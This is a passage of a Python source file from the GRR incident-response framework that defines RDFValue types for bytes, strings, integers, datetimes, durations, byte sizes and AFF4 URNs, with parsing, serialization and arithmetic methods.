] | 1 | 2022-03-02T09:58:05.000Z | 2022-03-02T09:58:05.000Z | grr/core/grr_response_core/lib/rdfvalue.py | tomchop/grr | 27ba38dc0f5ad4f3e0cdbfb146a0a789e3b0d27b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""AFF4 RDFValue implementations.
This module contains all RDFValue implementations.
NOTE: This module uses the class registry to contain all implementations of
RDFValue class, regardless of where they are defined. To do this reliably, these
implementations must be imported _before_ the relevant classes are referenced
from this module.
"""
from __future__ import division
from __future__ import unicode_literals
import abc
import calendar
import collections
import datetime
import functools
import logging
import posixpath
import re
import time
import zlib
from builtins import filter # pylint: disable=redefined-builtin
import dateutil
from dateutil import parser
from future.utils import iteritems
from future.utils import with_metaclass
from past.builtins import long
from typing import cast
from grr_response_core.lib import registry
from grr_response_core.lib import utils
# Factor to convert from seconds to microseconds
MICROSECONDS = 1000000
# Somewhere to keep all the late binding placeholders.
_LATE_BINDING_STORE = {}
def RegisterLateBindingCallback(target_name, callback, **kwargs):
  """Registers a callback to be invoked when the RDFValue named is declared.

  Args:
    target_name: Name of the (not yet declared) RDFValue class.
    callback: Callable invoked with target=<class> once the class is defined.
    **kwargs: Extra keyword arguments stored and forwarded to the callback.
  """
  _LATE_BINDING_STORE.setdefault(target_name, []).append((callback, kwargs))
class Error(Exception):
  """Base class for errors generated by RDFValue parsers."""
# Raised by RDFValue constructors given an unusable initializer parameter.
class InitializeError(Error):
  """Raised when we can not initialize from this parameter."""
class DecodeError(InitializeError, ValueError):
  """Generated when we can not decode the data."""

  def __init__(self, msg):
    # Record the failure at debug level before the exception propagates.
    logging.debug(msg)
    super(DecodeError, self).__init__(msg)
class RDFValueMetaclass(registry.MetaclassRegistry):
  """A metaclass for managing semantic values.

  Each newly defined RDFValue subclass triggers (and clears) any callbacks
  registered under its name via RegisterLateBindingCallback.
  """

  def __init__(cls, name, bases, env_dict):  # pylint: disable=no-self-argument
    super(RDFValueMetaclass, cls).__init__(name, bases, env_dict)

    # Run and clear any late binding callbacks registered for this class.
    for callback, kwargs in _LATE_BINDING_STORE.pop(name, []):
      callback(target=cls, **kwargs)
# TODO(user):pytype RDFValueMetaclass inherits MetaclassRegistry that
# inherits abc.ABCMeta, but type checker can't infer this, apparently because
# with_metaclass is used.
# pytype: disable=ignored-abstractmethod
class RDFValue(with_metaclass(RDFValueMetaclass, object)):
  """Baseclass for values.

  RDFValues are serialized to and from the data store.
  """

  # This is how the attribute will be serialized to the data store. It must
  # indicate both the type emitted by SerializeToDataStore() and expected by
  # FromDatastoreValue()
  data_store_type = "bytes"

  # URL pointing to a help page about this value type.
  context_help_url = None

  # Wrapped raw value; subclasses set a type-appropriate default.
  _value = None
  # Timestamp of this value; lazily promoted to RDFDatetime by the `age`
  # property.
  _age = 0

  # Mark as dirty each time we modify this object.
  dirty = False

  # If this value was created as part of an AFF4 attribute, the attribute is
  # assigned here.
  attribute_instance = None

  def __init__(self, initializer=None, age=None):
    """Constructor must be able to take no args.

    Args:
      initializer: Optional parameter to construct from.
      age: The age of this entry as an RDFDatetime. If not provided, create a
        new instance.

    Raises:
      InitializeError: if we can not be initialized from this parameter.
    """
    # Default timestamp is now.
    if age is None:
      age = RDFDatetime(age=0)

    self._age = age

    # Allow an RDFValue to be initialized from an identical RDFValue.
    # TODO(user):pytype: type checker can't infer that the initializer
    # is not None after the check below.
    if initializer.__class__ == self.__class__:
      self.ParseFromString(
          cast(self.__class__, initializer).SerializeToString())

  def Copy(self):
    """Make a new copy of this RDFValue."""
    res = self.__class__()
    res.ParseFromString(self.SerializeToString())
    return res

  def SetRaw(self, value, age=None):
    """Sets the wrapped value (and optionally the age) without parsing."""
    self._value = value
    if age is not None:
      self._age = age

  def __copy__(self):
    return self.Copy()

  @property
  def age(self):
    # Promote a raw timestamp (e.g. the int default) to RDFDatetime lazily.
    if self._age.__class__ is not RDFDatetime:
      self._age = RDFDatetime(self._age, age=0)

    return self._age

  @age.setter
  def age(self, value):
    """When assigning to this attribute it must be an RDFDatetime."""
    self._age = RDFDatetime(value, age=0)

  @abc.abstractmethod
  def ParseFromString(self, string):
    """Given a string, parse ourselves from it."""
    pass

  @abc.abstractmethod
  def ParseFromDatastore(self, value):
    """Initialize the RDF object from the datastore value."""
    pass

  @classmethod
  def FromDatastoreValue(cls, value, age=None):
    """Builds a new instance from a raw datastore value."""
    res = cls()
    res.ParseFromDatastore(value)
    if age:
      res.age = age
    return res

  @classmethod
  def FromSerializedString(cls, value, age=None):
    """Builds a new instance from its serialized string form."""
    res = cls()
    res.ParseFromString(value)
    if age:
      res.age = age
    return res

  def SerializeToDataStore(self):
    """Serialize to a datastore compatible form."""
    return self.SerializeToString()

  @abc.abstractmethod
  def SerializeToString(self):
    """Serialize into a string which can be parsed using ParseFromString."""

  @classmethod
  def Fields(cls):
    """Return a list of fields which can be queried from this value."""
    return []

  def __eq__(self, other):
    # Compares the wrapped value directly, so comparison against plain
    # primitives works.
    return self._value == other

  def __ne__(self, other):
    return not self.__eq__(other)

  def __hash__(self):
    return hash(self.SerializeToString())

  def __bool__(self):
    return bool(self._value)

  # Python 2 spelling of __bool__.
  def __nonzero__(self):
    return bool(self._value)

  def __str__(self):  # pylint: disable=super-on-old-class
    """Ignores the __repr__ override below to avoid indefinite recursion."""
    return super(RDFValue, self).__repr__()

  def __repr__(self):
    content = utils.SmartStr(self)

    # Truncate long values so reprs stay log-friendly.
    if len(content) > 100:
      content = content[:100] + "..."

    # Note %r, which prevents nasty nonascii characters from being printed,
    # including dangerous terminal escape sequences.
    return "<%s(%r)>" % (self.__class__.__name__, content)
class RDFPrimitive(RDFValue):
  """Base class for RDF values constructible from human-readable strings."""

  @classmethod
  def FromHumanReadable(cls, string):
    """Builds a new instance by parsing a human-readable unicode string."""
    instance = cls()
    instance.ParseFromHumanReadable(string)
    return instance

  @abc.abstractmethod
  def ParseFromHumanReadable(self, string):
    """Initializes the object from human-readable string.

    Args:
      string: An `unicode` value to initialize the object from.
    """
# pytype: enable=ignored-abstractmethod
class RDFBytes(RDFPrimitive):
  """An attribute which holds bytes."""
  data_store_type = "bytes"

  _value = b""

  def __init__(self, initializer=None, age=None):
    super(RDFBytes, self).__init__(initializer=initializer, age=age)
    # The base constructor only handles initializers of the exact same class;
    # fall back to parsing raw bytes here.
    if not self._value and initializer is not None:
      self.ParseFromString(initializer)

  def ParseFromString(self, string):
    utils.AssertType(string, bytes)
    self._value = string

  def ParseFromDatastore(self, value):
    utils.AssertType(value, bytes)
    self._value = value

  def ParseFromHumanReadable(self, string):
    utils.AssertType(string, unicode)
    self._value = string.encode("utf-8")

  def AsBytes(self):
    """Returns the wrapped raw bytes."""
    return self._value

  def SerializeToString(self):
    return self._value

  def __str__(self):
    return utils.SmartStr(self._value)

  # Comparisons unwrap another RDFBytes of the same class, otherwise compare
  # against the raw operand directly.
  def __lt__(self, other):
    if isinstance(other, self.__class__):
      return self._value < other._value  # pylint: disable=protected-access
    else:
      return self._value < other

  def __gt__(self, other):
    if isinstance(other, self.__class__):
      return self._value > other._value  # pylint: disable=protected-access
    else:
      return self._value > other

  def __eq__(self, other):
    if isinstance(other, self.__class__):
      return self._value == other._value  # pylint: disable=protected-access
    else:
      return self._value == other

  def __len__(self):
    return len(self._value)
class RDFZippedBytes(RDFBytes):
  """Zipped bytes sequence."""

  def Uncompress(self):
    """Returns the zlib-decompressed payload, or "" for an empty value."""
    if not self:
      return ""
    return zlib.decompress(self._value)
@functools.total_ordering
class RDFString(RDFPrimitive):
  """Represent a simple string."""

  data_store_type = "string"

  _value = u""

  # TODO(hanuszczak): Allow initializng form arbitrary `unicode`-able object.
  def __init__(self, initializer=None, age=None):
    # Deliberately pass initializer=None: initialization is dispatched on the
    # concrete type below instead of the base-class parse path.
    super(RDFString, self).__init__(initializer=None, age=age)

    if isinstance(initializer, RDFString):
      self._value = initializer._value  # pylint: disable=protected-access
    elif isinstance(initializer, bytes):
      self.ParseFromString(initializer)
    elif isinstance(initializer, unicode):
      self._value = initializer
    elif initializer is not None:
      message = "Unexpected initializer `%s` of type `%s`"
      message %= (initializer, type(initializer))
      raise TypeError(message)

  def format(self, *args, **kwargs):  # pylint: disable=invalid-name
    """Delegates to unicode.format on the wrapped value."""
    return self._value.format(*args, **kwargs)

  def split(self, *args, **kwargs):  # pylint: disable=invalid-name
    """Delegates to unicode.split on the wrapped value."""
    return self._value.split(*args, **kwargs)

  # NOTE: Python 2 semantics -- __str__ yields UTF-8 encoded bytes, while
  # __unicode__ yields the wrapped unicode value.
  def __str__(self):
    return self._value.encode("utf-8")

  def __unicode__(self):
    return self._value

  def __getitem__(self, item):
    return self._value.__getitem__(item)

  def __eq__(self, other):
    if isinstance(other, RDFString):
      return self._value == other._value  # pylint: disable=protected-access

    if isinstance(other, unicode):
      return self._value == other

    # TODO(hanuszczak): Comparing `RDFString` and `bytes` should result in type
    # error. For now we allow it because too many tests still use non-unicode
    # string literals.
    if isinstance(other, bytes):
      return self._value.encode("utf-8") == other

    message = "Unexpected value `%s` of type `%s`"
    message %= (other, type(other))
    raise TypeError(message)

  def __lt__(self, other):
    if isinstance(other, RDFString):
      return self._value < other._value  # pylint: disable=protected-access

    if isinstance(other, unicode):
      return self._value < other

    # TODO(hanuszczak): Comparing `RDFString` and `bytes` should result in type
    # error. For now we allow it because too many tests still use non-unicode
    # string literals.
    if isinstance(other, bytes):
      return self._value.encode("utf-8") < other

    message = "Unexpected value `%s` of type `%s`"
    message %= (other, type(other))
    raise TypeError(message)

  def ParseFromString(self, string):
    utils.AssertType(string, bytes)
    self._value = string.decode("utf-8")

  def ParseFromDatastore(self, value):
    utils.AssertType(value, unicode)
    self._value = value

  def ParseFromHumanReadable(self, string):
    utils.AssertType(string, unicode)
    self._value = string

  def SerializeToString(self):
    # Wire form is UTF-8 bytes...
    return self._value.encode("utf-8")

  def SerializeToDataStore(self):
    # ...but the datastore stores the unicode value directly.
    return self._value
# TODO(hanuszczak): This class should provide custom method for parsing from
# human readable strings (and arguably should not derive from `RDFBytes` at
# all).
class HashDigest(RDFBytes):
  """Binary hash digest with hex string representation."""

  data_store_type = "bytes"

  # NOTE(review): bytes.encode("hex") is Python 2 only; this class breaks on
  # Python 3 (would need binascii.hexlify / bytes.hex).
  def HexDigest(self):
    return self._value.encode("hex")

  def __str__(self):
    return self._value.encode("hex")

  def __eq__(self, other):
    # Accepts either the raw digest bytes or its hex rendering.
    return (self._value == utils.SmartStr(other) or
            self._value.encode("hex") == other)

  def __ne__(self, other):
    return not self.__eq__(other)
@functools.total_ordering
class RDFInteger(RDFPrimitive):
  """Represent an integer."""

  data_store_type = "integer"

  @staticmethod
  def IsNumeric(value):
    """True if *value* is an int/long/float or another RDFInteger."""
    return isinstance(value, (int, long, float, RDFInteger))

  def __init__(self, initializer=None, age=None):
    super(RDFInteger, self).__init__(initializer=initializer, age=age)
    # The base constructor only consumes same-class initializers; coerce
    # anything else to int here (default 0).
    if self._value is None:
      if initializer is None:
        self._value = 0
      else:
        self._value = int(initializer)

  def SerializeToString(self):
    return str(self._value)

  def ParseFromString(self, string):
    self._value = 0
    if string:
      try:
        self._value = int(string)
      except TypeError as e:
        raise DecodeError(e)

  def ParseFromDatastore(self, value):
    utils.AssertType(value, int)
    self._value = value

  def ParseFromHumanReadable(self, string):
    utils.AssertType(string, unicode)
    self._value = int(string)

  def __str__(self):
    return str(self._value)

  def __unicode__(self):
    return unicode(self._value)

  @classmethod
  def FromDatastoreValue(cls, value, age=None):
    return cls(initializer=value, age=age)

  def SerializeToDataStore(self):
    """Use varint to store the integer."""
    return self._value

  def __long__(self):
    return int(self._value)

  def __int__(self):
    return int(self._value)

  def __float__(self):
    return float(self._value)

  def __index__(self):
    return self._value

  # Arithmetic/bitwise operators below delegate to the wrapped int and
  # generally return plain numbers, not RDFInteger instances; the in-place
  # variants mutate the wrapped value and return self.
  def __lt__(self, other):
    return self._value < other

  def __and__(self, other):
    return self._value & other

  def __rand__(self, other):
    return self._value & other

  def __iand__(self, other):
    self._value &= other
    return self

  def __or__(self, other):
    return self._value | other

  def __ror__(self, other):
    return self._value | other

  def __ior__(self, other):
    self._value |= other
    return self

  def __add__(self, other):
    return self._value + other

  def __radd__(self, other):
    return self._value + other

  def __iadd__(self, other):
    self._value += other
    return self

  def __sub__(self, other):
    return self._value - other

  def __rsub__(self, other):
    return other - self._value

  def __isub__(self, other):
    self._value -= other
    return self

  def __mul__(self, other):
    return self._value * other

  # TODO(hanuszczak): There are no `__rop__` methods in Python 3 so all of these
  # should be removed. Also, in general it should not be possible to add two
  # values with incompatible types (e.g. `RDFInteger` and `int`). Sadly,
  # currently a lot of code depends on this behaviour but it should be changed
  # in the future.
  def __rmul__(self, other):
    return self._value * other

  def __div__(self, other):
    return self._value.__div__(other)

  def __truediv__(self, other):
    return self._value.__truediv__(other)

  def __floordiv__(self, other):
    return self._value.__floordiv__(other)

  def __hash__(self):
    return hash(self._value)
class RDFBool(RDFInteger):
  """Boolean value."""
  data_store_type = "unsigned_integer"

  def ParseFromHumanReadable(self, string):
    """Parses "true"/"false" (any case) or "1"/"0" into 1 or 0."""
    utils.AssertType(string, unicode)

    normalized = string.upper()
    if normalized == u"TRUE" or normalized == u"1":
      self._value = 1
    elif normalized == u"FALSE" or normalized == u"0":
      self._value = 0
    else:
      raise ValueError("Unparsable boolean string: `%s`" % string)
class RDFDatetime(RDFInteger):
  """A date and time internally stored in MICROSECONDS."""

  # Multiplier from seconds to the internal unit (microseconds here; subclass
  # RDFDatetimeSeconds overrides it).
  converter = MICROSECONDS
  data_store_type = "unsigned_integer"

  def __init__(self, initializer=None, age=None):
    super(RDFDatetime, self).__init__(None, age)

    self._value = 0

    if initializer is None:
      return

    if isinstance(initializer, (RDFInteger, int, long, float)):
      self._value = int(initializer)
    else:
      raise InitializeError(
          "Unknown initializer for RDFDateTime: %s." % type(initializer))

  @classmethod
  def Now(cls):
    """Returns the current wall-clock time as an instance of this class."""
    return cls(int(time.time() * cls.converter))

  def Format(self, fmt):
    """Return the value as a string formatted as per strftime semantics."""
    return time.strftime(
        fmt.encode("ascii"), time.gmtime(self._value / self.converter))

  def __str__(self):
    """Return the date in human readable (UTC)."""
    return self.Format("%Y-%m-%d %H:%M:%S")

  def __unicode__(self):
    return utils.SmartUnicode(str(self))

  def AsDatetime(self):
    """Return the time as a python datetime object."""
    return datetime.datetime.utcfromtimestamp(self._value / self.converter)

  def AsSecondsSinceEpoch(self):
    # Integer division: fractional seconds are truncated.
    return self._value // self.converter

  def AsMicrosecondsSinceEpoch(self):
    return self._value

  @classmethod
  def FromSecondsSinceEpoch(cls, value):
    # Convert to int in case we get fractional seconds with higher
    # resolution than what this class supports.
    return cls(int(value * cls.converter))

  @classmethod
  def FromDatetime(cls, value):
    """Builds an instance from a (UTC-interpreted) datetime.datetime."""
    res = cls()
    seconds = calendar.timegm(value.utctimetuple())
    res.SetRaw((seconds * cls.converter) + value.microsecond)
    return res

  @classmethod
  def FromHumanReadable(cls, value, eoy=False):
    res = cls()
    res.ParseFromHumanReadable(value, eoy=eoy)
    return res

  @classmethod
  def Lerp(cls, t, start_time, end_time):
    """Interpolates linearly between two datetime values.

    Args:
      t: An interpolation "progress" value.
      start_time: A value for t = 0.
      end_time: A value for t = 1.

    Returns:
      An interpolated `RDFDatetime` instance.

    Raises:
      TypeError: If given time values are not instances of `RDFDatetime`.
      ValueError: If `t` parameter is not between 0 and 1.
    """
    if not (isinstance(start_time, RDFDatetime) and
            isinstance(end_time, RDFDatetime)):
      raise TypeError("Interpolation of non-datetime values")

    if not 0.0 <= t <= 1.0:
      raise ValueError("Interpolation progress does not belong to [0.0, 1.0]")

    return RDFDatetime(round((1 - t) * start_time._value + t * end_time._value))  # pylint: disable=protected-access

  def ParseFromHumanReadable(self, string, eoy=False):
    # TODO(hanuszczak): This method should accept only unicode literals.
    self._value = self._ParseFromHumanReadable(string, eoy=eoy)

  # Arithmetic below treats plain numbers and Duration operands as SECONDS
  # and scales them by `converter`.
  def __add__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      # Assume other is in seconds
      return self.__class__(self._value + other * self.converter)

    return NotImplemented

  def __iadd__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      # Assume other is in seconds
      self._value += other * self.converter
      return self

    return NotImplemented

  def __mul__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      return self.__class__(self._value * other)

    return NotImplemented

  def __rmul__(self, other):
    return self.__mul__(other)

  def __sub__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      # Assume other is in seconds
      return self.__class__(self._value - other * self.converter)

    # datetime - datetime yields a Duration (whole seconds).
    if isinstance(other, RDFDatetime):
      return Duration(self.AsSecondsSinceEpoch() - other.AsSecondsSinceEpoch())

    return NotImplemented

  def __isub__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      # Assume other is in seconds
      self._value -= other * self.converter
      return self

    return NotImplemented

  @classmethod
  def _ParseFromHumanReadable(cls, string, eoy=False):
    """Parse a human readable string of a timestamp (in local time).

    Args:
      string: The string to parse.
      eoy: If True, sets the default value to the end of the year. Usually this
        method returns a timestamp where each field that is not present in the
        given string is filled with values from the date January 1st of the
        current year, midnight. Sometimes it makes more sense to compare against
        the end of a period so if eoy is set, the default values are copied from
        the 31st of December of the current
        year, 23:59h.

    Returns:
      The parsed timestamp.
    """
    # TODO(hanuszczak): Date can come either as a single integer (which we
    # interpret as a timestamp) or as a really human readable thing such as
    # '2000-01-01 13:37'. This is less than ideal (since timestamps are not
    # really "human readable) and should be fixed in the future.
    try:
      return int(string)
    except ValueError:
      pass

    # By default assume the time is given in UTC.
    # pylint: disable=g-tzinfo-datetime
    if eoy:
      default = datetime.datetime(
          time.gmtime().tm_year, 12, 31, 23, 59, tzinfo=dateutil.tz.tzutc())
    else:
      default = datetime.datetime(
          time.gmtime().tm_year, 1, 1, 0, 0, tzinfo=dateutil.tz.tzutc())
    # pylint: enable=g-tzinfo-datetime

    timestamp = parser.parse(string, default=default)
    return calendar.timegm(timestamp.utctimetuple()) * cls.converter

  def Floor(self, interval):
    """Rounds this timestamp down to a whole multiple of *interval* seconds."""
    if not isinstance(interval, Duration):
      raise TypeError("Expected `Duration`, got `%s`" % interval.__class__)

    seconds = self.AsSecondsSinceEpoch() // interval.seconds * interval.seconds
    return self.FromSecondsSinceEpoch(seconds)
class RDFDatetimeSeconds(RDFDatetime):
  """A DateTime class which is stored in whole seconds."""

  # converter == 1 means the raw value is the number of seconds directly
  # (the base RDFDatetime presumably uses a finer unit -- see its converter).
  converter = 1
class Duration(RDFInteger):
  """Duration value stored in seconds internally."""
  data_store_type = "unsigned_integer"

  # Unit suffix -> seconds per unit, ordered coarsest-first so that __str__
  # renders with the largest unit that evenly divides the value.
  # pyformat: disable
  DIVIDERS = collections.OrderedDict((
      ("w", 60 * 60 * 24 * 7),
      ("d", 60 * 60 * 24),
      ("h", 60 * 60),
      ("m", 60),
      ("s", 1)))
  # pyformat: enable

  def __init__(self, initializer=None, age=None):
    """Builds a Duration from seconds, a string like "2h", or another value.

    Args:
      initializer: A Duration, a human-readable string (e.g. "90s", "2h"),
        a number of seconds, an RDFInteger, or None (meaning 0 seconds).
      age: Optional age passed through to RDFInteger.

    Raises:
      InitializeError: If the initializer type is not supported.
    """
    super(Duration, self).__init__(None, age)
    if isinstance(initializer, Duration):
      self._value = initializer._value  # pylint: disable=protected-access
    elif isinstance(initializer, basestring):
      self.ParseFromHumanReadable(initializer)
    elif isinstance(initializer, (int, long, float)):
      self._value = initializer
    elif isinstance(initializer, RDFInteger):
      self._value = int(initializer)
    elif initializer is None:
      self._value = 0
    else:
      raise InitializeError(
          "Unknown initializer for Duration: %s." % type(initializer))

  @classmethod
  def FromSeconds(cls, seconds):
    """Alternate constructor from a plain number of seconds."""
    return cls(seconds)

  def Validate(self, value, **_):
    # Validation is "does it parse" -- raises on malformed input.
    self.ParseFromString(value)

  def ParseFromString(self, string):
    self.ParseFromHumanReadable(string)

  def SerializeToString(self):
    return str(self)

  @property
  def seconds(self):
    # The raw internal value is already in seconds.
    return self._value

  @property
  def microseconds(self):
    return self._value * 1000000

  def __str__(self):
    # Render with the coarsest unit that divides the value exactly,
    # e.g. 3600 -> "1h", 90 -> "90s".
    # NOTE(review): a non-integer value (e.g. 1.5) fails every divider test,
    # including "s", and this method then implicitly returns None -- confirm
    # that values are always whole seconds.
    time_secs = self._value
    for label, divider in iteritems(self.DIVIDERS):
      if time_secs % divider == 0:
        return "%d%s" % (time_secs // divider, label)

  def __unicode__(self):
    return utils.SmartUnicode(str(self))

  def __add__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      # Assume other is in seconds
      return self.__class__(self._value + other)

    return NotImplemented

  def __iadd__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      # Assume other is in seconds
      self._value += other
      return self

    return NotImplemented

  def __mul__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      # Result is truncated to whole seconds.
      return self.__class__(int(self._value * other))

    return NotImplemented

  def __rmul__(self, other):
    return self.__mul__(other)

  def __sub__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      # Assume other is in seconds
      return self.__class__(self._value - other)

    return NotImplemented

  def __isub__(self, other):
    if isinstance(other, (int, long, float, Duration)):
      # Assume other is in seconds
      self._value -= other
      return self

    return NotImplemented

  def __abs__(self):
    return Duration(abs(self._value))

  def Expiry(self, base_time=None):
    """Return the RDFDatetime at which this duration expires.

    Args:
      base_time: Optional RDFDatetime start; defaults to the current time.
    """
    if base_time is None:
      base_time = RDFDatetime.Now()
    else:
      base_time = base_time.Copy()

    base_time_sec = base_time.AsSecondsSinceEpoch()

    return RDFDatetime.FromSecondsSinceEpoch(base_time_sec + self._value)

  def ParseFromHumanReadable(self, timestring):
    """Parse a human readable string of a duration.

    Args:
      timestring: The string to parse, e.g. "2h", "90s" or "90" (plain
        seconds). An empty value leaves the duration unchanged.

    Raises:
      RuntimeError: If the unit suffix is not one of w/d/h/m/s.
      InitializeError: If the numeric part cannot be parsed.
    """
    if not timestring:
      return

    orig_string = timestring

    multiplicator = 1

    if timestring[-1].isdigit():
      # No unit suffix: the whole string is a number of seconds.
      pass
    else:
      try:
        multiplicator = self.DIVIDERS[timestring[-1]]
      except KeyError:
        raise RuntimeError("Invalid duration multiplicator: '%s' ('%s')." %
                           (timestring[-1], orig_string))

      timestring = timestring[:-1]

    try:
      self._value = int(timestring) * multiplicator
    except ValueError:
      raise InitializeError(
          "Could not parse expiration time '%s'." % orig_string)
class ByteSize(RDFInteger):
  """A size for bytes allowing standard unit prefixes.

  We use the standard IEC 60027-2 A.2 and ISO/IEC 80000:
  Binary units (powers of 2): Ki, Mi, Gi
  SI units (powers of 10): k, m, g
  """
  data_store_type = "unsigned_integer"

  # Lower-cased suffix -> multiplier ("i" variants are binary, 1024-based).
  DIVIDERS = dict((
      ("", 1),
      ("k", 1000),
      ("m", 1000**2),
      ("g", 1000**3),
      ("ki", 1024),
      ("mi", 1024**2),
      ("gi", 1024**3),
  ))

  # "<number><optional unit><optional b>", case-insensitive, e.g. "1.5GiB".
  REGEX = re.compile("^([0-9.]+)([kmgi]*)b?$", re.I)

  def __init__(self, initializer=None, age=None):
    """Builds a ByteSize from a number, a string like "10mb", or another value.

    Raises:
      InitializeError: If the initializer type is not supported.
    """
    super(ByteSize, self).__init__(None, age)
    if isinstance(initializer, ByteSize):
      self._value = initializer._value  # pylint: disable=protected-access
    elif isinstance(initializer, basestring):
      self.ParseFromHumanReadable(initializer)
    elif isinstance(initializer, (int, long, float)):
      self._value = initializer
    elif isinstance(initializer, RDFInteger):
      self._value = int(initializer)
    elif initializer is None:
      self._value = 0
    else:
      raise InitializeError(
          "Unknown initializer for ByteSize: %s." % type(initializer))

  def __str__(self):
    """Render with binary units, e.g. "1.5GiB"; values <= 1024 as "<n>B"."""
    # NOTE(review): under Python 2 "/" is integer division for int values
    # (1536 -> "1.0KiB") while under Python 3 it is true division
    # (-> "1.5KiB"). Confirm which rounding is intended before porting.
    size_token = ""
    if self._value > 1024**3:
      size_token = "GiB"
      value = self._value / 1024**3
    elif self._value > 1024**2:
      size_token = "MiB"
      value = self._value / 1024**2
    elif self._value > 1024:
      size_token = "KiB"
      value = self._value / 1024
    else:
      return utils.SmartStr(self._value) + "B"

    return "%.1f%s" % (value, size_token)

  def ParseFromHumanReadable(self, string):
    """Parse a human readable string of a byte string.

    Args:
      string: The string to parse.

    Raises:
      DecodeError: If the string can not be parsed.
    """
    if not string:
      return None

    match = self.REGEX.match(string.strip().lower())
    if not match:
      raise DecodeError("Unknown specification for ByteSize %s" % string)

    multiplier = self.DIVIDERS.get(match.group(2))
    if not multiplier:
      # Suffix matched the character class but is not a known unit
      # (e.g. "ik").
      raise DecodeError("Invalid multiplier %s" % match.group(2))

    # The value may be represented as a float, but if not dont lose accuracy.
    value = match.group(1)
    if "." in value:
      value = float(value)
    else:
      value = int(value)

    self._value = int(value * multiplier)
@functools.total_ordering
class RDFURN(RDFPrimitive):
  """An object to abstract URL manipulation."""

  data_store_type = "string"

  # Careful when changing this value, this is hardcoded a few times in this
  # class for performance reasons.
  scheme = "aff4"

  # Normalized path component (without the "aff4:" prefix); class-level
  # default for instances that were never parsed.
  _string_urn = ""

  def __init__(self, initializer=None, age=None):
    """Constructor.

    Args:
      initializer: A string (bytes or unicode) or another RDFURN.
      age: The age of this entry.

    Raises:
      TypeError: If the initializer is of an unsupported type.
    """
    # This is a shortcut that is a bit faster than the standard way of
    # using the RDFValue constructor to make a copy of the class. For
    # RDFURNs that way is a bit slow since it would try to normalize
    # the path again which is not needed - it comes from another
    # RDFURN so it is already in the correct format.
    if isinstance(initializer, RDFURN):
      # Make a direct copy of the other object
      self._string_urn = initializer.Path()
      super(RDFURN, self).__init__(None, age=age)
      return

    super(RDFURN, self).__init__(initializer=initializer, age=age)
    if self._value is None and initializer is not None:
      if isinstance(initializer, bytes):
        self.ParseFromString(initializer)
      elif isinstance(initializer, unicode):
        self.ParseFromUnicode(initializer)
      else:
        # NOTE(review): the closing backtick after the second %s is missing
        # in this message template.
        message = "Unsupported initializer `%s` of type `%s"
        message %= (initializer, type(initializer))
        raise TypeError(message)

  def ParseFromString(self, initializer):
    """Create RDFRUN from a UTF-8 encoded byte string.

    Args:
      initializer: url string (bytes)
    """
    utils.AssertType(initializer, bytes)
    self.ParseFromUnicode(initializer.decode("utf-8"))

  def ParseFromUnicode(self, initializer):
    """Parse a unicode URL, stripping any "aff4:" scheme prefix."""
    utils.AssertType(initializer, unicode)
    # Strip off the aff4: prefix if necessary. [5:] removes "aff4:" and
    # keeps the leading "/".
    if initializer.startswith("aff4:/"):
      initializer = initializer[5:]

    self._string_urn = utils.NormalizePath(initializer)

  def ParseFromDatastore(self, value):
    utils.AssertType(value, unicode)
    # TODO(hanuszczak): We should just assign the `self._string_urn` here
    # instead of including all of the parsing magic since the data store values
    # should be normalized already. But sadly this is not the case and for now
    # we have to deal with unnormalized values as well.
    self.ParseFromUnicode(value)

  def ParseFromHumanReadable(self, string):
    self.ParseFromUnicode(string)

  def SerializeToString(self):
    return str(self)

  def SerializeToDataStore(self):
    return unicode(self)

  def Dirname(self):
    return posixpath.dirname(self._string_urn)

  def Basename(self):
    return posixpath.basename(self.Path())

  def Add(self, path, age=None):
    """Add a relative stem to the current value and return a new RDFURN.

    If urn is a fully qualified URN, replace the current value with it.

    Args:
      path: A string containing a relative path.
      age: The age of the object. If None set to current time.

    Returns:
      A new RDFURN that can be chained.

    Raises:
      ValueError: if the path component is not a string.
    """
    if not isinstance(path, basestring):
      raise ValueError("Only strings should be added to a URN.")

    result = self.Copy(age)
    result.Update(path=utils.JoinPath(self._string_urn, path))

    return result

  def Update(self, url=None, path=None):
    """Update one of the fields.

    Args:
      url: An optional string containing a URL.
      path: If the path for this URN should be updated.
    """
    if url:
      self.ParseFromString(url)
    if path:
      # Assigned verbatim -- callers are expected to pass a normalized path.
      self._string_urn = path
    self.dirty = True

  def Copy(self, age=None):
    """Make a copy of ourselves."""
    if age is None:
      age = int(time.time() * MICROSECONDS)
    return self.__class__(self, age=age)

  def __str__(self):
    return utils.SmartStr("aff4:%s" % self._string_urn)

  def __unicode__(self):
    return utils.SmartUnicode(u"aff4:%s" % self._string_urn)

  def __eq__(self, other):
    # Strings are coerced to RDFURN so "aff4:/a" compares equal to the urn.
    if isinstance(other, basestring):
      other = self.__class__(other)

    elif other is None:
      return False

    elif not isinstance(other, RDFURN):
      return NotImplemented

    return self._string_urn == other.Path()

  def __bool__(self):
    return bool(self._string_urn)

  def __nonzero__(self):
    # Python 2 spelling of __bool__.
    return bool(self._string_urn)

  def __lt__(self, other):
    # NOTE(review): compares the raw path against `other` directly;
    # presumably `other` is a string or another RDFURN -- confirm the
    # intended ordering semantics (total_ordering derives the rest).
    return self._string_urn < other

  def Path(self):
    """Return the path of the urn."""
    return self._string_urn

  def Split(self, count=None):
    """Returns all the path components.

    Args:
      count: If count is specified, the output will be exactly this many path
        components, possibly extended with the empty string. This is useful for
        tuple assignments without worrying about ValueErrors: namespace, path =
        urn.Split(2)

    Returns:
      A list of path components of this URN.
    """
    if count:
      # Empty components (from leading/duplicate slashes) are filtered out,
      # then the result is right-padded with "" up to `count` entries.
      result = list(filter(None, self._string_urn.split("/", count)))
      while len(result) < count:
        result.append("")

      return result

    else:
      return list(filter(None, self._string_urn.split("/")))

  def RelativeName(self, volume):
    """Given a volume URN return the relative URN as a unicode string.

    We remove the volume prefix from our own.

    Args:
      volume: An RDFURN or fully qualified url string.

    Returns:
      A string of the url relative from the volume or None if our URN does not
      start with the volume prefix.
    """
    string_url = utils.SmartUnicode(self)
    volume_url = utils.SmartUnicode(volume)
